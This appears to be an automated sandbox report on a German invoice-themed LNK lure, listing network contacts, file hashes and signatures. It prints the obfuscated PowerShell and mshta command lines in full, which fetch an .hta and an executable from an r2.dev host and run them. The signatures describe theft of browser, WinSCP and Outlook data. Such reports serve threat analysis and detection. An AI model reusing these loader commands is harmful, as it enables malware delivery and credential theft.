$vXhNEzkB + 'EXBRRVQT.exe';hQzEzFacg $AvKehPB $WRrNymqB;uuuOHRemK $AvKehPB;;;;}TQiKbyGz;
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | pub-5b9223b1b9e74a70be22a0816a8b7ead.r2.dev | udp |
| US | 162.159.140.237:443 | pub-5b9223b1b9e74a70be22a0816a8b7ead.r2.dev | tcp |
| US | 162.159.140.237:443 | pub-5b9223b1b9e74a70be22a0816a8b7ead.r2.dev | tcp |
| US | 8.8.8.8:53 | www.microsoft.com | udp |
| US | 23.192.22.93:80 | www.microsoft.com | tcp |
Files
memory/2580-38-0x000007FEF61BE000-0x000007FEF61BF000-memory.dmp
memory/2580-39-0x000000001B630000-0x000000001B912000-memory.dmp
memory/2580-40-0x0000000001F40000-0x0000000001F48000-memory.dmp
memory/2580-41-0x000007FEF5F00000-0x000007FEF689D000-memory.dmp
memory/2580-42-0x000007FEF5F00000-0x000007FEF689D000-memory.dmp
memory/2580-43-0x000007FEF5F00000-0x000007FEF689D000-memory.dmp
memory/2580-45-0x0000000002BDB000-0x0000000002C42000-memory.dmp
memory/2580-44-0x000007FEF5F00000-0x000007FEF689D000-memory.dmp
memory/2488-61-0x000000001B630000-0x000000001B912000-memory.dmp
memory/2488-62-0x0000000001D20000-0x0000000001D28000-memory.dmp
Analysis: behavioral5
Detonation Overview
Submitted
2024-11-14 20:00
Reported
2024-11-14 20:02
Platform
win7-20240708-en
Max time kernel
117s
Max time network
127s
Command Line
Signatures
Blocklisted process makes network request
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\mshta.exe | N/A |
| N/A | N/A | C:\Windows\system32\mshta.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Downloads MZ/PE file
Command and Scripting Interpreter: PowerShell
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Enumerates physical storage devices
Modifies system certificate store
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\CABD2A79A1076A31F21D253635CB039D4329A5E8 | C:\Windows\system32\mshta.exe | N/A |
| Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\CABD2A79A1076A31F21D253635CB039D4329A5E8\Blob = (certificate blob omitted) | C:\Windows\system32\mshta.exe | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of WriteProcessMemory
Processes
C:\Windows\system32\cmd.exe
cmd /c C:\Users\Admin\AppData\Local\Temp\Rechnung_2024_0093.pdf.lnk
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy UnRestricted $a='48aAs.69edS3b/:15u2vtmrpL0-7h'; &(-join($a[(-648+652),(169-167),(990-966)])) ^[ (-join($a[(-648+652),(169-167),(990-966)])); ^[ /# (-join($a[(-476+497),(-648+652),(-158+186),(-824+844),(169-167)])); foreach($z in @((-105+133),(-426+446),(575-555),(173-150),(-217+221),(-509+523),(524-511),(711-698),(210-187),(-471+488),(-724+736),(-668+694),(-606+622),(-351+363),(906-899),(-719+737),(899-881),(166-155),(387-375),(-188+203),(-604+616),(783-776),(-378+386),(775-748),(660-660),(995-993),(803-776),(-863+888),(-920+932),(333-325),(994-976),(559-541),(700-698),(835-810),(-958+959),(425-410),(-411+417),(686-684),(-963+964),(569-557),(934-907),(861-853),(-724+726),(950-941),(494-489),(-470+492),(-789+807),(805-800),(-232+241),(-603+611),(1008-989),(-242+255),(-653+668),(-705+723),(580-569),(-536+541),(986-958),(736-716),(-368+370))){$m+=$a[$z]}; /# $m;
C:\Windows\system32\mshta.exe
"C:\Windows\system32\mshta.exe" https://pub-5b9223b1b9e74a70be22a0816a8b7ead.r2.dev/123.hta
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy UnRestricted function hQzEzFacg($guorUJ, $OIoEigYq){[IO.File]::WriteAllBytes($guorUJ, $OIoEigYq)};function uuuOHRemK($guorUJ){if($guorUJ.EndsWith((ijnaJnaV @(5036,5090,5098,5098))) -eq $True){Start-Process (ijnaJnaV @(5104,5107,5100,5090,5098,5098,5041,5040,5036,5091,5110,5091)) $guorUJ}else{Start-Process $guorUJ}};function xlptFHdqR($FSYzd){$EBqZdo = New-Object (ijnaJnaV @(5068,5091,5106,5036,5077,5091,5088,5057,5098,5095,5091,5100,5106));[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::TLS12;$OIoEigYq = $EBqZdo.DownloadData($FSYzd);return $OIoEigYq};function ijnaJnaV($UxikGUX){$MKUYRJP=4990;$VRwScE=$Null;foreach($NymBWJi in $UxikGUX){$VRwScE+=[char]($NymBWJi-$MKUYRJP)};return $VRwScE};function TQiKbyGz(){$vXhNEzkB = $env:APPDATA + '\';$WRrNymqB = xlptFHdqR (ijnaJnaV @(5094,5106,5106,5102,5105,5048,5037,5037,5102,5107,5088,5035,5043,5088,5047,5040,5040,5041,5088,5039,5088,5047,5091,5045,5042,5087,5045,5038,5088,5091,5040,5040,5087,5038,5046,5039,5044,5087,5046,5088,5045,5091,5087,5090,5036,5104,5040,5036,5090,5091,5108,5037,5059,5078,5056,5072,5072,5076,5071,5074,5036,5091,5110,5091));$AvKehPB = $vXhNEzkB + 'EXBRRVQT.exe';hQzEzFacg $AvKehPB $WRrNymqB;uuuOHRemK $AvKehPB;;;;}TQiKbyGz;
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | pub-5b9223b1b9e74a70be22a0816a8b7ead.r2.dev | udp |
| US | 172.66.0.235:443 | pub-5b9223b1b9e74a70be22a0816a8b7ead.r2.dev | tcp |
| US | 172.66.0.235:443 | pub-5b9223b1b9e74a70be22a0816a8b7ead.r2.dev | tcp |
| US | 8.8.8.8:53 | crl.microsoft.com | udp |
| GB | 2.19.252.157:80 | crl.microsoft.com | tcp |
| US | 8.8.8.8:53 | www.microsoft.com | udp |
| US | 23.192.22.93:80 | www.microsoft.com | tcp |
Files
memory/2804-38-0x000007FEF596E000-0x000007FEF596F000-memory.dmp
memory/2804-39-0x000007FEF56B0000-0x000007FEF604D000-memory.dmp
memory/2804-40-0x000000001B6F0000-0x000000001B9D2000-memory.dmp
memory/2804-41-0x0000000002290000-0x0000000002298000-memory.dmp
memory/2804-42-0x000007FEF56B0000-0x000007FEF604D000-memory.dmp
memory/2804-43-0x000007FEF56B0000-0x000007FEF604D000-memory.dmp
memory/2804-44-0x000007FEF56B0000-0x000007FEF604D000-memory.dmp
memory/2804-45-0x000007FEF56B0000-0x000007FEF604D000-memory.dmp
memory/1140-61-0x000000001B6C0000-0x000000001B9A2000-memory.dmp
memory/1140-62-0x0000000001D90000-0x0000000001D98000-memory.dmp
Analysis: behavioral6
Detonation Overview
Submitted
2024-11-14 20:00
Reported
2024-11-14 20:02
Platform
win10v2004-20241007-en
Max time kernel
131s
Max time network
147s
Command Line
Signatures
Blocklisted process makes network request
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\mshta.exe | N/A |
| N/A | N/A | C:\Windows\system32\mshta.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Downloads MZ/PE file
Checks computer location settings
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\USER\S-1-5-21-940901362-3608833189-1915618603-1000\Control Panel\International\Geo\Nation | C:\Windows\system32\cmd.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-940901362-3608833189-1915618603-1000\Control Panel\International\Geo\Nation | C:\Windows\system32\mshta.exe | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\EXBRRVQT.exe | N/A |
| N/A | N/A | C:\Windows\Temp\{3553DFEA-0E14-48EA-985C-867D5C26F859}\.cr\EXBRRVQT.exe | N/A |
| N/A | N/A | C:\Windows\Temp\{E8C9FDB1-3232-4A01-8303-C53009CE1E33}\.ba\ActiveISO.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\MonitorBrowser2\ActiveISO.exe | N/A |
Loads dropped DLL
Reads WinSCP keys stored on the system
Reads user/profile data of web browsers
Accesses Microsoft Outlook profiles
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\USER\S-1-5-21-940901362-3608833189-1915618603-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 | C:\Users\Admin\AppData\Local\Temp\UploadAlt_Ti.exe | N/A |
Command and Scripting Interpreter: PowerShell
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of SetThreadContext
| Description | Indicator | Process | Target |
| PID 1344 set thread context of 632 | N/A | C:\Users\Admin\AppData\Roaming\MonitorBrowser2\ActiveISO.exe | C:\Windows\SysWOW64\cmd.exe |
Browser Information Discovery
Enumerates physical storage devices
System Location Discovery: System Language Discovery
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Roaming\EXBRRVQT.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\Temp\{3553DFEA-0E14-48EA-985C-867D5C26F859}\.cr\EXBRRVQT.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\Temp\{E8C9FDB1-3232-4A01-8303-C53009CE1E33}\.ba\ActiveISO.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\MonitorBrowser2\ActiveISO.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\MonitorBrowser2\ActiveISO.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\cmd.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\cmd.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\UploadAlt_Ti.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\UploadAlt_Ti.exe | N/A |
Suspicious behavior: MapViewOfSection
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\MonitorBrowser2\ActiveISO.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\cmd.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of WriteProcessMemory
outlook_office_path
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\USER\S-1-5-21-940901362-3608833189-1915618603-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 | C:\Users\Admin\AppData\Local\Temp\UploadAlt_Ti.exe | N/A |
Processes
C:\Windows\system32\cmd.exe
cmd /c C:\Users\Admin\AppData\Local\Temp\Rechnung_2024_0093.pdf.lnk
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy UnRestricted $a='48aAs.69edS3b/:15u2vtmrpL0-7h'; &(-join($a[(-648+652),(169-167),(990-966)])) ^[ (-join($a[(-648+652),(169-167),(990-966)])); ^[ /# (-join($a[(-476+497),(-648+652),(-158+186),(-824+844),(169-167)])); foreach($z in @((-105+133),(-426+446),(575-555),(173-150),(-217+221),(-509+523),(524-511),(711-698),(210-187),(-471+488),(-724+736),(-668+694),(-606+622),(-351+363),(906-899),(-719+737),(899-881),(166-155),(387-375),(-188+203),(-604+616),(783-776),(-378+386),(775-748),(660-660),(995-993),(803-776),(-863+888),(-920+932),(333-325),(994-976),(559-541),(700-698),(835-810),(-958+959),(425-410),(-411+417),(686-684),(-963+964),(569-557),(934-907),(861-853),(-724+726),(950-941),(494-489),(-470+492),(-789+807),(805-800),(-232+241),(-603+611),(1008-989),(-242+255),(-653+668),(-705+723),(580-569),(-536+541),(986-958),(736-716),(-368+370))){$m+=$a[$z]}; /# $m;
C:\Windows\system32\mshta.exe
"C:\Windows\system32\mshta.exe" https://pub-5b9223b1b9e74a70be22a0816a8b7ead.r2.dev/123.hta
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy UnRestricted function hQzEzFacg($guorUJ, $OIoEigYq){[IO.File]::WriteAllBytes($guorUJ, $OIoEigYq)};function uuuOHRemK($guorUJ){if($guorUJ.EndsWith((ijnaJnaV @(5036,5090,5098,5098))) -eq $True){Start-Process (ijnaJnaV @(5104,5107,5100,5090,5098,5098,5041,5040,5036,5091,5110,5091)) $guorUJ}else{Start-Process $guorUJ}};function xlptFHdqR($FSYzd){$EBqZdo = New-Object (ijnaJnaV @(5068,5091,5106,5036,5077,5091,5088,5057,5098,5095,5091,5100,5106));[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::TLS12;$OIoEigYq = $EBqZdo.DownloadData($FSYzd);return $OIoEigYq};function ijnaJnaV($UxikGUX){$MKUYRJP=4990;$VRwScE=$Null;foreach($NymBWJi in $UxikGUX){$VRwScE+=[char]($NymBWJi-$MKUYRJP)};return $VRwScE};function TQiKbyGz(){$vXhNEzkB = $env:APPDATA + '\';$WRrNymqB = xlptFHdqR (ijnaJnaV @(5094,5106,5106,5102,5105,5048,5037,5037,5102,5107,5088,5035,5043,5088,5047,5040,5040,5041,5088,5039,5088,5047,5091,5045,5042,5087,5045,5038,5088,5091,5040,5040,5087,5038,5046,5039,5044,5087,5046,5088,5045,5091,5087,5090,5036,5104,5040,5036,5090,5091,5108,5037,5059,5078,5056,5072,5072,5076,5071,5074,5036,5091,5110,5091));$AvKehPB = $vXhNEzkB + 'EXBRRVQT.exe';hQzEzFacg $AvKehPB $WRrNymqB;uuuOHRemK $AvKehPB;;;;}TQiKbyGz;
C:\Users\Admin\AppData\Roaming\EXBRRVQT.exe
"C:\Users\Admin\AppData\Roaming\EXBRRVQT.exe"
C:\Windows\Temp\{3553DFEA-0E14-48EA-985C-867D5C26F859}\.cr\EXBRRVQT.exe
"C:\Windows\Temp\{3553DFEA-0E14-48EA-985C-867D5C26F859}\.cr\EXBRRVQT.exe" -burn.clean.room="C:\Users\Admin\AppData\Roaming\EXBRRVQT.exe" -burn.filehandle.attached=544 -burn.filehandle.self=528
C:\Windows\Temp\{E8C9FDB1-3232-4A01-8303-C53009CE1E33}\.ba\ActiveISO.exe
"C:\Windows\Temp\{E8C9FDB1-3232-4A01-8303-C53009CE1E33}\.ba\ActiveISO.exe"
C:\Users\Admin\AppData\Roaming\MonitorBrowser2\ActiveISO.exe
C:\Users\Admin\AppData\Roaming\MonitorBrowser2\ActiveISO.exe
C:\Windows\SysWOW64\cmd.exe
C:\Windows\SysWOW64\cmd.exe
C:\Users\Admin\AppData\Local\Temp\UploadAlt_Ti.exe
C:\Users\Admin\AppData\Local\Temp\UploadAlt_Ti.exe
C:\Program Files\Google\Chrome\Application\123.0.6312.123\elevation_service.exe
"C:\Program Files\Google\Chrome\Application\123.0.6312.123\elevation_service.exe"
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | 58.55.71.13.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 86.49.80.91.in-addr.arpa | udp |
| US | 8.8.8.8:53 | pub-5b9223b1b9e74a70be22a0816a8b7ead.r2.dev | udp |
| US | 162.159.140.237:443 | pub-5b9223b1b9e74a70be22a0816a8b7ead.r2.dev | tcp |
| US | 8.8.8.8:53 | 20.160.190.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 95.221.229.192.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 237.140.159.162.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 232.168.11.51.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 125.21.192.23.in-addr.arpa | udp |
| US | 162.159.140.237:443 | pub-5b9223b1b9e74a70be22a0816a8b7ead.r2.dev | tcp |
| US | 8.8.8.8:53 | 217.106.137.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 53.210.109.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 206.23.85.13.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 92.12.20.2.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 88.144.22.2.in-addr.arpa | udp |
| US | 8.8.8.8:53 | sirnisirlo.online | udp |
| US | 172.67.214.86:443 | sirnisirlo.online | tcp |
| US | 8.8.8.8:53 | 86.214.67.172.in-addr.arpa | udp |
Files
memory/4560-2-0x00007FFE71FB3000-0x00007FFE71FB5000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_5wlcbxwn.d5f.ps1
| MD5 | d17fe0a3f47be24a6453e9ef58c94641 |
| SHA1 | 6ab83620379fc69f80c0242105ddffd7d98d5d9d |
| SHA256 | 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7 |
| SHA512 | 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82 |
memory/4560-12-0x0000015C6E8F0000-0x0000015C6E912000-memory.dmp
memory/4560-13-0x00007FFE71FB0000-0x00007FFE72A71000-memory.dmp
memory/4560-14-0x00007FFE71FB0000-0x00007FFE72A71000-memory.dmp
memory/4560-17-0x00007FFE71FB0000-0x00007FFE72A71000-memory.dmp
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log
| MD5 | 2f57fde6b33e89a63cf0dfdd6e60a351 |
| SHA1 | 445bf1b07223a04f8a159581a3d37d630273010f |
| SHA256 | 3b0068d29ae4b20c447227fbf410aa2deedfef6220ccc3f698f3c7707c032c55 |
| SHA512 | 42857c5f111bfa163e9f4ea6b81a42233d0bbb0836ecc703ce7e8011b6f8a8eca761f39adc3ed026c9a2f99206d88bab9bddb42da9113e478a31a6382af5c220 |
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | 75b4b2eecda41cec059c973abb1114c0 |
| SHA1 | 11dadf4817ead21b0340ce529ee9bbd7f0422668 |
| SHA256 | 5540f4ea6d18b1aa94a3349652133a4f6641d456757499b7ab12e7ee8f396134 |
| SHA512 | 87feaf17bd331ed6afd9079fefb1d8f5d3911ababf8ea7542be16c946301a7172a5dc46d249b2192376957468d75bf1c99752529ca77ec0aa78a8d054b3a6626 |
C:\Users\Admin\AppData\Roaming\EXBRRVQT.exe
| MD5 | b6ab13b3b9903bf84327737ba227bab3 |
| SHA1 | 65dff8665b502ba33f3effb8430263e4f906c1c0 |
| SHA256 | baa56e574d8deed445d0e58487add9d429d60bbb1b39943c581bcf50e9bd91d6 |
| SHA512 | 6f6ec1217e14f96a52cfa314327a09bfe74199fa0a85d94f0bd5381a0af7c96ac26ba8b5506663f76473c0714609c80d58cb86bde73888cfd6ea15060793f5c7 |
C:\Windows\Temp\{3553DFEA-0E14-48EA-985C-867D5C26F859}\.cr\EXBRRVQT.exe
| MD5 | eb26dfa5e4e3170d90b5629df0715aa9 |
| SHA1 | bbc10367aa29aa36a6e53c63b60a6936bc6f1720 |
| SHA256 | 70721a20760818839c7ef0ce2d684666bd07bbb79b87415944c6efbce58f7906 |
| SHA512 | 11e2683c8f47c62548050f863386e62908c5dd7e456ca13c22644ecb984533d3abdd72d1fd5a3ac53c1b2734e5999554d383f3f5c615d4c94c4c169664787bf9 |
C:\Windows\Temp\{E8C9FDB1-3232-4A01-8303-C53009CE1E33}\.ba\Helicoid.dll
| MD5 | a9c5977784daf8cebe8408a8b6db3fbe |
| SHA1 | 8ae8d67007cdca9acf96681ffa6200e5847972de |
| SHA256 | 63f5a34563b62de3dffa57401d7225f4687933cef250b78b995eee813c862fad |
| SHA512 | 886fbea2c959ce4245185d1dcec3efcfbb50a71840c964d4fd8e0a46f7fbf8afbf7445bc2d892789f25124b862912fb0c3556c5004a7e6ddb4ee13b87cf58a65 |
C:\Windows\Temp\{E8C9FDB1-3232-4A01-8303-C53009CE1E33}\.ba\ActiveISO.exe
| MD5 | b84dfabe933d1160f624693d94779ce5 |
| SHA1 | ac0133c09708fe4a3c626e3ba4cdf44d3a0e065f |
| SHA256 | 588cb61b36a001384a2833bd5df8d7982ca79d6ae17a3d83a94e01b1e79684bd |
| SHA512 | eeaeef8d6b5fa02dedf9818babaa4b5ffdb87300521883aa290289dcc720b3d543279085ed3fc649b74654143e678502e56eb3f92c4baf53c075977de33c1b0e |
C:\Windows\Temp\{E8C9FDB1-3232-4A01-8303-C53009CE1E33}\.ba\Qt5Widgets.dll
| MD5 | c502bb8a4a7dc3724ab09292cd3c70d6 |
| SHA1 | ff44fddeec2d335ec0eaa861714b561f899675fd |
| SHA256 | 4266918226c680789d49cf2407a7fec012b0ed872adafb84c7719e645f9b2e6d |
| SHA512 | 73bef89503ce032fba278876b7dab9eac275632df7a72c77093d433c932272da997e8fbeb431a09d84baac7b2ab2e55222ff687893311949a5603e738bfa6617 |
C:\Windows\Temp\{E8C9FDB1-3232-4A01-8303-C53009CE1E33}\.ba\vcruntime140_1.dll
| MD5 | 75e78e4bf561031d39f86143753400ff |
| SHA1 | 324c2a99e39f8992459495182677e91656a05206 |
| SHA256 | 1758085a61527b427c4380f0c976d29a8bee889f2ac480c356a3f166433bf70e |
| SHA512 | ce4daf46bce44a89d21308c63e2de8b757a23be2630360209c4a25eb13f1f66a04fbb0a124761a33bbf34496f2f2a02b8df159b4b62f1b6241e1dbfb0e5d9756 |
C:\Windows\Temp\{E8C9FDB1-3232-4A01-8303-C53009CE1E33}\.ba\vcruntime140.dll
| MD5 | f12681a472b9dd04a812e16096514974 |
| SHA1 | 6fd102eb3e0b0e6eef08118d71f28702d1a9067c |
| SHA256 | d66c3b47091ceb3f8d3cc165a43d285ae919211a0c0fcb74491ee574d8d464f8 |
| SHA512 | 7d3accbf84de73fb0c5c0de812a9ed600d39cd7ed0f99527ca86a57ce63f48765a370e913e3a46ffc2ccd48ee07d823dafdd157710eef9e7cc1eb7505dc323a2 |
C:\Windows\Temp\{E8C9FDB1-3232-4A01-8303-C53009CE1E33}\.ba\msvcp140.dll
| MD5 | 7db24201efea565d930b7ec3306f4308 |
| SHA1 | 880c8034b1655597d0eebe056719a6f79b60e03c |
| SHA256 | 72fe4598f0b75d31ce2dc621e8ef161338c6450bb017cd06895745690603729e |
| SHA512 | bac5729a3eb53e9bc7b680671d028cabef5ea102dfaa48a7c453b67f8ecb358db9f8fb16b3b1d9ea5a2dff34f459f6ac87f3a563c736d81d31048766198ff11e |
C:\Windows\Temp\{E8C9FDB1-3232-4A01-8303-C53009CE1E33}\.ba\Qt5Core.dll
| MD5 | 8c735052a2d4e9b01b0e028f0c20f67c |
| SHA1 | b72bde11de3310a495dd16520362f4adbf21717a |
| SHA256 | d751ab0357f71586b1793ce4166295aba085334647d6e3ffcd49287a801273e7 |
| SHA512 | 0bbd920e1b48361c7f3e1540ddb12fa6c9146bfe36e13eba2b2e6ca8bf3ad961d88121c6f70eca6d9ea413900455e696f7233c5bb54415ca7d2c9c1c0d4c1fb3 |
C:\Windows\Temp\{E8C9FDB1-3232-4A01-8303-C53009CE1E33}\.ba\Qt5Network.dll
| MD5 | fe5ed4c5da03077f98c3efa91ecefd81 |
| SHA1 | e23e839ec0602662788f761ebe7dd4b39c018a7f |
| SHA256 | d992aaeb21cb567113126c2912cf75e892c8e3ead5d50147a11abe704b9e2e2b |
| SHA512 | 22514732a0edf8fc2b8770139599132429080b86d2844143d21bb834cbddaaa077d763969960e39e2050a69493c1aae191600e5df6107bde90fae589a054f071 |
C:\Windows\Temp\{E8C9FDB1-3232-4A01-8303-C53009CE1E33}\.ba\Qt5Gui.dll
| MD5 | 34893cb3d9a2250f0edecd68aedb72c7 |
| SHA1 | 37161412df2c1313a54749fe6f33e4dbf41d128a |
| SHA256 | ca8334b2e63bc01f0749afeb9e87943c29882131efe58608ea25732961b2df34 |
| SHA512 | 484e32832d69ec1799bd1bcc694418801c443c732ed59ecd76b3f67abf0b1c97d64ae123728dfa99013df846ba45be310502ef6f8da42155da2e89f2a1e8cb2c |
C:\Windows\Temp\{E8C9FDB1-3232-4A01-8303-C53009CE1E33}\.ba\Qt5PrintSupport.dll
| MD5 | d0634933db2745397a603d5976bee8e7 |
| SHA1 | ddec98433bcfec1d9e38557d803bc73e1ff883b6 |
| SHA256 | 7d91d3d341dbba568e2d19382e9d58a42a0d78064c3ad7adfe3c7bb14742c2b1 |
| SHA512 | 9271370cd22115f68bd62572640525e086a05d75f5bc768f06e20b90b48a182f29a658a07099c7bc1e99bf0ffcf1229709524e2af6745d6fed7b41c1addd09f1 |
C:\Windows\Temp\{E8C9FDB1-3232-4A01-8303-C53009CE1E33}\.ba\StarBurn.dll
| MD5 | 41e19ba2364f2c834b2487e1d02bb99a |
| SHA1 | 6c61d603dddfe384a93ad33775b70681d0a396d9 |
| SHA256 | c040a25377028b0c28db81a012de786c803a0e9d6f87ce460335a621d31f5340 |
| SHA512 | 6ebf4a9e80f16c6a03ff357d2da9a34a4227bfd65eb66d1d335349a77ba066d069ba0d47d46229b3c77b59052c42d388678662f970b418d8cc3cfb1223427d8c |
memory/4580-90-0x00007FFE70580000-0x00007FFE70ACE000-memory.dmp
C:\Windows\Temp\{E8C9FDB1-3232-4A01-8303-C53009CE1E33}\.ba\vechpt
| MD5 | dd899ca13e5bef55bcea07e167da891b |
| SHA1 | e883f0240f127520486f063b033fb34fa2dfe5c1 |
| SHA256 | a818d6fa8caddaa608345ea40b75073a7c98637161794918566e2ddeeede47e7 |
| SHA512 | e38437899fcc433ef89a04c6a68684ea5110181af48a4699836939cf167d0c1fe7932432518445e90acbcbc151ee324d77de064147d97fdedf6ecabaac788c06 |
C:\Windows\Temp\{E8C9FDB1-3232-4A01-8303-C53009CE1E33}\.ba\dcfa
| MD5 | 456596683dad1217c76d8c0f47b5cfbc |
| SHA1 | 001ae3f937aa75ad2175289c6e8f09561a1cbb35 |
| SHA256 | a7e578d0f7a5d522e4b4e62864f77cbb1830dc7e7026c9ee0b5f6fa7156c727f |
| SHA512 | 537420007a4985f2deb4b2a48af1ba61cf8cc112359ec1cdbd02dfb8e958ab5ab4ec302cd0698a14d4560afe6c23627d1d4d080eac9daa7cb5edc7259cb73591 |
memory/4580-93-0x00007FFE70400000-0x00007FFE70572000-memory.dmp
memory/1344-131-0x00007FFE71240000-0x00007FFE7178E000-memory.dmp
memory/1344-134-0x00007FFE70400000-0x00007FFE70572000-memory.dmp
memory/1344-135-0x00007FFE70400000-0x00007FFE70572000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\940862fc
| MD5 | c3cec1b04ec373823d4adb1029a0bd1e |
| SHA1 | cd34cffcfb3bff8253661b02927e09436cf7543c |
| SHA256 | 54335d5d5fb92c75c5bedd2ac9818c66e4dffd42d5cff31f536be56c155ce5f2 |
| SHA512 | 30def85163cd72a76d74818bbf151a2ca540d85349ccc474521405cd449bbe402f722a1cc97d4d3f497bac38e59d754ef4fba655d1b010edfde02736a29f2936 |
memory/632-138-0x00007FFE90390000-0x00007FFE90585000-memory.dmp
memory/632-141-0x0000000074B80000-0x0000000074CFB000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\UploadAlt_Ti.exe
| MD5 | 967f4470627f823f4d7981e511c9824f |
| SHA1 | 416501b096df80ddc49f4144c3832cf2cadb9cb2 |
| SHA256 | b22bf1210b5fd173a210ebfa9092390aa0513c41e1914cbe161eb547f049ef91 |
| SHA512 | 8883ead428c9d4b415046de9f8398aa1f65ae81fe7945a840c822620e18f6f9930cce2e10acff3b5da8b9c817ade3dabc1de576cbd255087267f77341900a41c |
memory/3720-148-0x00007FF6B4700000-0x00007FF6B49E6000-memory.dmp
